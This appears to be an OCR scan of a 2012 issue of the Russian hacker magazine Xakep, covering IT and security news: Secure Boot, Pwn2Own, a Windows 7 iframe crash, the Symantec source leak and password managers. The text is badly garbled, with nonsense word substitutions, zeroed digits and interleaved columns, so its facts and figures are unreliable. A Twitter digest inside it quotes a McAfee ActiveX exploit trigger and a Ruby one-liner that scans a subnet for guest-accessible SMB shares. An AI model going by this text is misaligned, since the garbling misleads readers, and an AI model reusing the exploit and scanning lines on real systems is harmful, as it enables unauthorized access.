результа т е имели засве т ы, битые пиксели да т. п. П охоже, тепер ь 0amsuпg решил а ис пр авить э т с промах.

Мо д елка 027 В 070 выпо л нена во соли д ном да одновре­ менно со во ерхтонком корпусе, а по сию пору основы управления

помещены во эргономичную алюминиевую подставку !там же нахо д ятся брюки ввода - вывода равным образом U 0 В -концентраторl , регулируемую сообразно высоте. Д иапазон регулирования монитора 0-й серии объединение высо т е составляет

00 см,

достоинство его

дозволено н а клонять. П а н ел ь имеет ультравысокую наглядность

QHD 02560 х 04401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI равным образом Н DMI, а как и оснащена стереодинамика ­ ми мощностью 0 Вт равно интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов равно планшетных П К. Устройство п касательно дд ерживает эксклюзивную технологию

0amsung

Nat uг al Соlог Е х р ег t , ко во озмож н стандарт ваш покорнейший слуга м которой

относитс аз многогрешный аппаратная ка л ибровка цветов. 027 В 070

но <<эффект мокрой шмотье >> !, каковой сплошь и рядом проявляе т ся

ловок фиксировать больше миллиарда оттенков, ась?

дажеутоповых современных дисплеев. Так вроде <<кристал­

гарантирует высоченный реализм да рука быть отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий да ви д еороликов, сделанных со через

нели, у глянцевых мониторов симпатия на поверку отсутствует.

цифирный фо т о- другими словами видеокамеры. Кстати, пресс-релиз

Здесь достаточно заметить, что-то да первые образцы для базе

обещае т, сколько инже н еры 0amsuпg вруч н ую будут на­

вызвали немалое бум утех, про кого заблаговременно общем

страи на ать ц ветопере д ачу для аждого монитора серии

0

PL5

Яр кость: 000 кд/м 0 Равномерность )мин .): 00% К возлюбленный т растность (статичес ко ая) :

0000:1 Время отклика

(GTG): 0 м с Угол обзора (гор/верт.) : 078°/1 08°

во целых н относительно удобства н ое на бельма изображение, однако соответственно пирушка но

получи окончательном этапе сборки. Кроме ведь г относительно , весь участок

причине : РL5 - дисплеи со матовым экраном по существу

дисплея вот и все снабжена антибликовым стеклянным 011

никак не проявляли <<кристаллическо г что касается эффекта>>.

покрытием. Да-да, со т арое доброе лупа вместе с антибликом,

Р а зрешение : 0560х 0440 Глуб ан а цвета : 0,07 млн цветов

Ожидается, зачем новинка поступит во продажууже на мар­

давненько автор такого безвыгодный видели. Этот новый различие

те текущего возраст lк сожалению, неизвестно, появится ли

надо особенно обра д по части во атыех, чьи шары чувствитель­

возлюбленная и да во России!. Ориентировочная валюта 027В970

ны для что-то около н я ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 00.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 0012


PhoneAndroid: Почти закончил не без;

linux.js. Да,

сие

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему ваша милость возьми меня приближенно

Яндекс, сnециалист объединение безопас­

Chгoot-ing на

ности веб-приложений: спе­

легко, по образу равно А : , Б:, В : ...

циалист согласно безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- приблизительно

а

приложений на компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, на винде также не грех <<чрутить>> ...

lilcBekrar: Взлом Chгome не без;

ASLR + О ЕР­

обходом + славный сnлойт интересах

Комментарий: Конкурс Яндекса

El

за взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем на разных мирах .

El

0О ко бак­ #pwn2own

А чисто равно РоС на

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

ко

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся постоянно сложнее, равным образом для того их обхода требуется в большинстве случаев сил равным образом вложений ...

McAfee

Secuгity-as-a-Service,

что устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот равно огулом эксплойт- obj.ShowRepoгt

позволяющий производить адрес

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... видишь этак антивирусная ком­

А покамест забавно, аюшки? эа такую

тила во районе

lilmartincronje:

lilmeder: Написал на блог по отношению моем послед­

Водан единожды да на всех :

нем баге:

CSS

иначе JаvаSсгiрt-библиотек

подобно

jQuery.

CVE-2011-3923.

Еще

одно удаленное пиликанье

заключение во Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 для баксов . :] Вот где-то ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам невыгодный доверяй никогда, Люк! Дебаггером воспользуйся вначале равным образом убедись во потоке

Кэп ...

Сегодня у нас короче несть ссылок­

общеобразовательный книга т витов, так сказать. Те, который думает, зачем возьми

Java

lilmikesica:

не запрещается

Любой благоприятный конструктор лени­

кадить, неграмотный оnасаясь RСЕ-багов !ну вроде же,

вый, тем невыгодный менее, безвыгодный всякий

Java- сие ж секурно], вообразите пока что раэ! Ведь накадить не запрещается всякое ...

инертный конструктор хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал новоизобретённый блог-пост: разглядывание

багов во виртуальной машине с через «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, который инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 054].each {lxl puts "host- 00.0 . 0 . #{х}"; 'smbclient -L 00.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт чтобы скана «шар» от учет­

какой гостя ...

обратите не заговаривать зубы в это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга ради браузеров

Не знал по части BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

в целях

обнаружения бинарников сверх

NX, SafeSEH, /dynamicbase, да т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные по части шести миллионах nоль з ователей крупнейшей во КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы вместе с относительно Щ е ­

BSOD

В

WINDOWS 0

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч в таком случае на це ло м в рассуждении н

п по части ддержи на аети д е ю о ткрыты х д анн ы х , н касательно д ек покровитель ац ию касательно т­ к рытого госуд а рства как-т об « невыгодный что касается цени л •>.

Кстати, официал ь ­

равным образом

нф по части р ма ция насчёт н в отношении рев н е ради ко рытой для ритиче не без; ко в рассуждении й у аз многогрешный з вим ос т равно на Wind ow s 0 х6 0 вп е рвы е появила вместе с ь в Т витт е р е изв йес тн по отношению г по части ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д только кр а т н ы й вин в рассуждении вни для кри т ич йес ки х ошиб об ко на Win XPI.

в отношении бнар у ж е н во ф а йле операционной систем ы

ных коммента р ие на

ко т относительно ры й от что до д е р жи т вслед за во ис ящ у ю по части т ядра ча не без; ть п касательно льз что касается ва­

п в отношении поводупри­

т е л ьско г в отношении ан т е р ф е йс а да насчёт тн ос ящ уюс ваш покорнейший слуга ко нем у инфрастр у к­

сутствия главы Ми н­ комсвязи получи встреч е

ту р у. Зам е тим, чт по отношению 02 - би тн а автор на е р из ия ОС далеко не в из nриимчива

членов Пиратск по отношению й

для ош ибке, на так вр е мя для ак 0 0- б итная << Семерка » может

партиитак равным образом невыгодный по­

н е толь ко у й т равно равно з-з а безграмотный е на

следова л касательно .

BSOD,

же да nозволяе т насадить

на ма ш равным образом н у вр е д в отношении н ос ный для касательно д возьми у р ов далеко не ядра. Однако самый ин т е р нашел ны й нюан вместе с з а для лючается во др у гом: пр что до тотип заключение , демонс т риру ющ е го , вроде ваша сестра з ы ва т ь отваленный из ибо й, сделано у тек в С е ть . О ко а з а лос ь , ч ведь сие пр ос т ой НТМ L- скрипт. Е г в рассуждении з а­ п уск во б ра узе р е

Sa fari б ы вместе с тр касательно пр иведет ко ошиб ке вместе с тра н и­

ц ы сверху н е спр е д е л е н в м у ча от т ко е nамяти, равным образом орудие n об кажет

•с да н ий э стриппер из м е рти ». Этотскриn т представля е тсоб в отношении й все г в отношении только т е г

iframe со чр ез выч ай н по части б об льшим атриб у томишко

высо т ы. Уя зви м ос т да т по отношению чн что до п касательно дв е р а держи 04-битная модификация

для

а для бесспорно , во России П ира т екая ассоциация даж е неграмотный зарегистрирована [нет,

Windows 0, насчёт дн ако,

ребята пытались , же ничто никак не ваша милость ш ло) . Тем отнюдь не м е нее, туман т ия систематически

ском п р об ме аттракцион что до во фактически ы да др у г ие не без; да вместе с темы. Патчана установленный

nроводитсобрания,одноизкоторыхсостоялосьв не без; ерединея н варвара

момен т н е су щ е ств условная единица т .

наравне через м е ч аю т э для со перты , м об г у т бытовать

во книж н ом магазине << Ц иолко во скиЙ>>, к~то ры й наход ится во зда н ии П олитехниче ­ ского музея . Д ля всех пришедших для совмест н ый слет П иратской n артии, Ф дьявол д а развития электронной демократии да рабочей группы << ИГ рекламация н ых действий>> стало полной неожиданностью происхождение на магазине Игоря Щ еголе на а , ми н да ­

стра маза равно массовых коммуникаций РФ. П редсе д атель партии П а на ел Р ассуд что до в nишет во своем ЖЖ : << М инистр есть вид. наравне будт в отношении зашел на на ы хо дн ой купит ь п ару для ниг равным образом синь порох далеко не знал относительно н амечен н по отношению м собрании. П рисутст на ую щишки е н а на стре ч е п ро г раммеры со р азу нак ан ул ись держи Щ е г репатриант во а. Ещ е быl Н е каж д ый д е н ь есть т ь возможность заявить во се аюшки? думаешь во образина министру связи. Ау n р в рассуждении гр ам ми­

стов было что такое? ему сказать.

:1 Н по части министрдержался молодцом, говорил ск л а дн о,

тем не менее далеко не сказал сносно конкретного. Сразу видимое дело - немаленький опы т работ ы в аппарате >> . Щеголев ответил в колонна вопросов, вслед д анных учас т никами собра ­ ния. В частности, рассказа л , почто вслед за го д -по л пятикнижие на Р оссии може т б ыть вв е д е н а

построение электронного голосова н ия, за всем тем общество, по мнению ми н равным образом ю минис т ра, пока малограмотный испытывает nотребнос т равно на экий системе. П одробности во ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО сообразно числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт по части Cr ysis 0 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ да nолно-

от амо й скач равно ваемойчерез

nомощью здесь но обвинил

комnании

обогнав

стью п е р е й -де т получи и распишись magnet-

BitТo r rent игрой ради РС

ссы л ки. Теn ерь magnet-U RL

во 00 01 г оду. С л едо м равно дутСаll of Du ty: Modern Warfa r e 0 и Battlefield 0.

Google во nоддержке nиратства . В Google сnоко й только доставать

Seagate-

Samsung по части ошибаться

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 015. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т из ваш покорный слуга дл аз многогрешный загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter равно из его

звалиобвинение чушью .

ХАКЕР

03 /158/ 0012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика на качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще на конце прошлого возраст шарага

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, по отношению нежели согласен выступление .

В конце 0011-го общество

Microsoft в главнейший раз озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта деятельность служба е ттак : UEFI сохраняет«секретные ключи >> на ОС. Все, почто хочетзагрузиться нате компьютер, ко при­ меру операционная система, да со польз условные единицы тэти ключи чтобы до­

от туп а ко

UEFI. Е сли во ОС невыгодный прописан отвечающий требованиям кнопка ,

симпатия безграмотный получит лицензия получи загрузку. Liпu х-сооб ще вместе с тво уже если на то пошло попыталосьдонести по пр оиз водителей , аюшки?

воплотить в жизнь передач у ключей в из-за а назначить

Linu x хорэ куда сложно, Linu x держи заточенные лещадь Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , что-нибудь отнюдь не имеет Linu x равным образом дру ги х об ткрыты х ОС , равно сражается

синь порох сравнительно со чем

нисколечко отнюдь не со ко нк у р е нтами , а из вредоносными кодами. Мол , безопасная заваливание тем да х ороша чтобы работы

для

итайская пароходство Edi fieг представила на э том месяце за единый вздох двум новых модели. Об е новинки по­

полнили топовую линей ку систем

0.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

не без; пр о­

фессиональным микрофонным входом, который-нибудь имеет независимый балансир громкости . Новинка может похва­

случаться тради ц ионным пользу кого

Edifier деревянным

кор пусом

[что гарантирует что до т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : держи заводах

компании Edifier производится более 12 млн комплектов мультимедийных к что до лонок во година . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

со магнитным экра н иро на а нием равно 08-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит глобально

получи и распишись входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г что касается повышения высоких частот, которая спе циаль­

славный конструктор

вредоно сных программ. Надо признать, выглядит весь это действительно логично. Но днесь

Microsoft подготовила плавдок уме нте требова­

ниями, которые что поделаешь выполнитьдля сертификации компьютеров получай со вместимо ст ь от Windows 0. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше общей сложности про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х паркет брать на буксир сер тификацию Windows 0для своих усик тро йств,

да конструктор Фил

из траница

Джонс .

мо сбыть осуществимость отключения

так разработана пользу кого мультиме диа.

Windows, что такое?

такойпроцессперекрываетещеодинканалпроникновения

016: « В системах, неграмотный относящихся кАRМ, необходи­ Secure Boot помощью

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 0 . 0-система, оснащенная 0-дюймовыми НЧ-динамиками да 03-мм шелковыми куполообразными

щий пользовательд что до лж е н пользоваться выполнимость отключить

Secure Boot путем интерфейс установки, безвыгодный владея Pkpri v. Программное обесточивание Secure Boot средствами UEFI

т ви терами, неплохо воспроизводитгл убок ий, шикарный

никак не надлежит состоять как будто ни кайфовый период из-за грузки , ни по мнению ее

контрабас равно зво нки е высокие частоты. Габариты

об кончании>>.

скромны:

040 х 026 х 097 мм.

R900T до чертиков

Колонки мелочёвка подсоединить

П олучается, просьба

Microsoft от м, аюшки? возлюбленная небу­

ко выбранн ым источникам сигнала чрез 0,5-мм не без; тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA или — или RCA для RCA,

выключение

ко торые вместе с п особ ны хватить да уси прыскать

Secure Boot, бери деле распространялось всего лишь

сигнал, делающий от любого источника звука, да обес пе­

получи традиционные ПК , н по части далеко не получи АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся в ар х итектуре ARM , теперь не накануне лжны выделять никаких способов отключения безопасной загрузки. Именно сей время - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная нагрузка -ставит Linu x [и никак не только! во затруд­ нительное положение. Фактически сие озна чает, чтотеперь для «за гружаемости >> сверху одной изо таких машин , сертифици­ рованных получи и распишись противоречие вместе с Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 00 02

0, подобранный

ди от трибутив Linuхдолжен у кого есть се ртифицированные крип­ таключи через конкретного да з г отови т ел моя особа компьютера. Вста е т ре з онный вопрос: идеже их взять? Е сли выдачей ключей будут за ниматься производители , ведь разработчикам ди стрибу ­ тивов придется поодиночке контактировать со каждым с ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам сие врядли окажется около силу. Централи­ зова нного что касается ргана сер тификации , который-нибудь бы формировал к лючи с целью режима безопасной загрузки

UEFI, отнюдь не существует. Microsoft пытается сражаться далеко н е исключительно не без; малварью, да равно из устано во для ой Linu x, Android да др у­ Словом, по мнению хоже,

ги х открытых ОС в АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS сделал очереднуюуязвимость на GSM . Подробности симпатия нонче невыгодный разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы поуже далеко не ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый многообразный софт да желе­ зо, а nотом уносят не без; на вывеску

хакнутыетрофеи [железные, конечно же) на качестве близ ­ зов. Сообщаем, что такое? на этом году устав соревнования

изменились. Теперь на конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome да Mozilla lnteгnet Exploгer,

0-принтеры долго , однако верой и правдой про­ бираются получи узкопотребительский биржа .

Уже не долго думая экий девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож так около приобрести ради пару

стем

вариант, а далеко не хуже безграмотный придумаешь технический уставка не­

вообразимых размеров. С каждым среди бела дня об этих трехмерных чудесах прогресса появляется всегда

вяще статей, постов, дискуссий. А крат интерес и испытание растут, появляется равным образом ультиматум .

Ещ е пр по части шлой в осеннее время получи т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел от пр ограммами

на 00-принтеров, хотя какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 0 равным образом

Мае

05 Lion

[последние версии со все-

тысяч долларов, равным образом э т касательно короче то-то и есть «домашний»

ми патчами). Мобильные

Одним с особливо

девайсына конкурсе значительнее

известны х про·

вскрывать безграмотный будут.

ектов по мнению ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое ко т

получи и распишись команда

до созданию принте­

Hewlett- Packard. 30

р что до во , способных

Три по мнению бедителя получат денежныепризыв размере 00тысяч,

живописать

тысяч да 05тысяч долларов плюстрофеи во виде н аутбуков от пирушка самой

себя. Новейшая

системой , которую им удастся взломать.

форма называется

Mendel, равно снарядить

Компания

Google вот и все учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали члениться в духе содержание ми,

ее горазд любой желающий (это

приблизительно да реальными объектами. Уже в ту же минуту на этом

впрямь не·

углубление вслед за исnолнение sandbox-кoдa вместе с исnользованием одной всего только

разделе не грех вместе с кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости на

после хакинг браузера Chгome. Она обе щает расчеться

всех компонентов

Chrome.

В

0О тысяч долларов оценивается

ис п олне н ие

изо вселенной Warhammeг 00К не в таком случае — не то хот-род­

составляет итого

sandbox-кoдa из исnользованием уязвимастей по образу во Chгome, где-то да во

мо д е ль ш евроле

$520.

операционной системе.

0970 годы .

Н в рассуждении сие безобидные

игру ш ки, а тогда на Сети ранее некоторое пора цир­

Но самое главное, в чем дело? на этом году изменятся самочки кредо

кулируютслухи от м, в чем дело? сверху черном рынкетор­

Pwn20wn . Взломанная доктрина теnерь невыгодный неосуществимо

гуюти30-моделямискиммеровдлябанкоматов.

зания, что до тех пор . Все накипь участники имеют достижимость

изо состя­

Есть даж е n одтверж д е ния тому, почто моше нни ки

на движение трех конкурсных дней открывать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, плод соревнования в эту пору подсчитывается

Н е т, на « Б ухте» они нонче малограмотный во сплывали, только сие

no очкам.

прямо воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов по мнению всему миру резво появится

курсе не грех входить в состав равным образом на удаленном режиме!

Pwn20wn

nройдете

0 сообразно 0 марта.

Не забывай, аюшки? на кон ­

покамест по отношению дна головная глоссалгия .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, эдак равно получи и распишись энтузиастов.

В режимах чтения\эаписи

H

Seri senees

02 GB

пропускная дарование

достигает

0 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи ранее начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 06 Г б стоит $130, QD-H32 сверху 02 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

кто проводится еже­

Однако сверху первом месте

Также представлены равно устрой­

годно . Лучших ждет вояж

по мнению популярнотипо-прежнему

ства ради работы от новым

во штаб-квартиру Facebook,

есть смысл Java, а вслед за ней идут С,

а победительполучитпять

С# равно С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная сочинение со доступом во Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров шарага Symaпtec, являющаяся одним изо самых известных на мире поставщиков решений

на сфере информационной безопасности, была вынуждена признать, зачем хаке рам посчастливилось получитьдоступ для исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, во ходе расследования было установлено, зачем хищение исходного заключение анти­

вирусов произошла сызнова на

0006 году.

После сего бражка ввела галерея

мер ради усиления безопасности, в надежде безграмотный пустить повторения по­ добных инцидентов во будущем. Хакерам посчастливилось спереть исходные коды таких продуктов, что Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks да pcAnywheгe версий

02.0, 12.5. Об утечке из чего можно заключить не тайна во середине прошлого месяца, когда кое-какой пират Yama Tough, причисляющий себя да для «Ано нимам», и ко хакерекой группировке Lo гd of Dhaгmaгaja, написал во Твиттере, что располагает исходниками Noгton Utilities. В знак он 12.1

равно

выложил ссылки возьми низкий свидетельство из описанием программно­ го интерфейса сервиса с целью создания насчёт писаний образцов вирусов,

а по прошествии времени да из писок файлов, содержащихся во архиве из исходным кодом Nогtоп Antiviгus. Опубликованный дезоксикортикостерон у мент, кстати, датируется апрелем

0999 года.

Конечно же,

Symantec зараз сообщила,

что-то

новость изо сего документа малограмотный может напакостить нынешним продуктам компании. Зато картотека от скончание ным кодом команда малограмотный про­ комментировала.

П что касается заявлениям самих хакеров, информа цию им посчастливилось выудить

из серверов ведомства военной разведки Индии. Иными словами,

у поллюция произошла безвыгодный изо сетей самой Symaпtec [хоть сие радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, с тем помочь судебному разбирательству, которое

только что началось во США. Д есятого января сравнительно от чем Symaпtec было выдвинуто претензия во том, что-то возлюбленная продвигаетсвою продукцию с через в такой мере называемых sсагеwаге-программ, которые запугива­

индеец пользователей, извещая их об возможных проблемах вместе с безопасно­ ст ью на особенно назойливой форме. Несмотря сверху до сей времени заявления Symaпtec, сколько у хакеров оказались старые данные, которые отнюдь не могут намыть никакого вреда, раз­

работчики сейчас начали опускать патчи. Компания предп очитает перестраховаться , кроме зависимости оттого, из каких мест не кто иной «утекла»

данные да как симпатия актуальна сверху настоящий момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

03-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn для бесnлатным книгам и nоnулярные новинки.

Скачивайте да читайте получи

www.wexler.ru!

:х:

что до

«МЕТРО 0033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

об

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 (800) 000 06 00


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

другими словами извращаться не без; его синхронизацией вследствие

активировать во аккаунте

Использовать одиночный да оный а шаг функция про всех

оный а самый Dг орЬох . Дост уп ко хранилищу

вые шаг роли, ведь завернуть помимо такого токе для достаточно

сервисов сразу- одна с самых серьезных

защищен мастер-ключом [сложным паролем),

ранее невозможно. Каждый крат достаточно необхо­

ошибок пользователей. Но да побеждать на голове

некоторый во целях безопасности отчаянно

партия относительно вмонтировать флешку, не заботиться

огромное доля уникальных пассов­

восстановить. Будь осторожен!:)

эксплуатировать сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я безграмотный буду разглашать в отношении том, в духе использо­

Только на этом случае позволено склифосовский по головке отнюдь не погладить до самого

дилемма безоговорочно непосильная. Я продолжительно пытался

одноразо­

Sesame

равно

параль вкупе со своим мастер-ключом.

приучить себя ко использованию менеджеров

движение ролей по-видимому

LastPass

KeyPass [keepass.info), хотя

изо сего беспричинно ничто равным образом малограмотный вышло. Открывать

вать

программу, с намерением отыскивать после спешный параль

могу безграмотный открыть со тобой несколькими по­

-явно никак не самое удобное, сколько не запрещается приду­

лезными фишками, которые меня порадовали .

LastPass,- после

весь элементарно. Но никак не

мать. Да равным образом локальное хранилище, во котором

хранилища. По отдельности аюшки? мастер-ключ, что флешка от

Sesame

сокровище про злоумыш­

ленника уж отнюдь не представляют.

Двухфакторнан согласие от

Google

находятся зашифрованные танцевальный шаг роли, попахивает

Проверка надежности движение ролей

Для авторизации твоя милость в свою очередь можешь дать взятку

архаизмом- никак не драть но его бери флешке?

Водан всего-навсего звезда того , в чем дело? движение роли хранятся

истый токен-например YuЬikey вслед за

Короче говоря, аз многогрешный решил отправить в рот решения,

во надежном хранилище, безграмотный делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые круглым счетом же, наравне да

настоящему безопасными.

ся уж готовым решением с

KeyPass,

:)

помогали бы

LastPass

со твоего

Google.

$25

Напомню ,

вызывать уникальные движение роли равным образом охранять

разрешения может свершить борзый обсуждение

почто построение через поискового гиганта предлагает

их, хотя кроме всего прочего автоматично использо-

пассов, быстро отыскав посредь них простые равным образом от­

установку насмартфон специального прило­

иди для черту бы их на браузере! Вариантов тутовник безграмотный в такой мере

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, тот или другой высчитывает

«123456») . В програм­

[Google Authenticatoг), которая во с головы

время времени генерирует редчайший одно­

самый раскрученной оказалась утилита

бонитет надежности всех паролей,- ре­

на один раз ключ. Так на правах аз многогрешный неустанно пользуюсь

0Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат допускается провести аналогию от показателями других

этой системой пользу кого входа на

раиса изначально появилась интересах Мае, хотя через некоторое время

пользователей на специальном рейтинге.

настроил ее равным образом интересах защиты

Одноразовые парали

са йте 0helpdesk.lastpass . com/secuгity-options/

goog 0е -а ut hе nti саtог).

была портирована равно для того

Windows.

Продукт

адски качественный, хотя отдавать назад $69.99 следовать

Gmail, так ваш покорный слуга туточки же LastPass . Подроб­

ную инструкцию допускается сыскать получи и распишись официальном

кроссплатформенную версию ми показалось

Многих, всему вероятию , смутит реальность до­

слишком. Тем побольше сегодня, когда-когда практиче­

чеди для батман ролям из через одного токмо

ски чтобы общей сложности дозволено встретить бесплатную альтер­

мастер-ключа . Нет проблем! На флешку позволяется

одноразовые парали равно двухфакторная автори­

нативу. Та ко вая, на общем-то, истинно

внести специальную утилиту LastPass Sesame [есть версии лещадь любые ОС), которая,

зация доступны только лишь платным подписчикам .

бегло нашлась-ейстал великолепный

служба

до сути, превращает диск на токе н. Если

